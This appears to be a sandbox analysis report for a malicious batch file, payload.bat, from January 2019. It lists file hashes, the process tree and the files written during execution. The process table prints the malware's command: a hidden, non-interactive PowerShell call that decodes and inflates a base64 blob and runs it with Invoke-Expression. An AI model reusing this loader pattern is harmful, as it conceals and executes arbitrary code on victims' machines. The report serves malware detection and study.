| Field | Value |
|---|---|
| File name | payload.bat |
| Full analysis | https://app.any.run/tasks/85768cdc-f828-4c4e-a26f-a4ddb77387f0 |
| Verdict | Malicious activity |
| Analysis date | January 22, 2019, 13:07:52 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators | |
| MIME | text/x-msdos-batch |
| File info | DOS batch file, ASCII text, with very long lines |
| MD5 | BC2070FA5E151D883B692CA291B076FA |
| SHA1 | EAED67E685FDAAEC4D5DF8CB6ED6E716EA5B1798 |
| SHA256 | 6C57EC191B8AA093C556733A3E4E9C82DA49E2C88762CBEC59476C86A80D0F96 |
| SSDEEP | 48:DM7B/Xff7TsdnEEboVUS2O947DY3a55VOhAPff7TsdnEEboVUS2O947DY3a55VO7:Db9bE9J47DrHkhl9bE9J47DrHkh1 |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2872 | `cmd /c ""C:\Users\admin\AppData\Local\Temp\payload.bat" "` | C:\Windows\system32\cmd.exe | — | explorer.exe |
| 3672 | `powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"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\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"` | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe |

| PID | User | Company | Integrity Level | Description | Exit code | Version |
|---|---|---|---|---|---|---|
| 2872 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 3672 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3672 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X9BQ2F1XC522Y2NYTWE5.temp | — | — | — |
| 3672 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20d630.TMP | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
| 3672 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |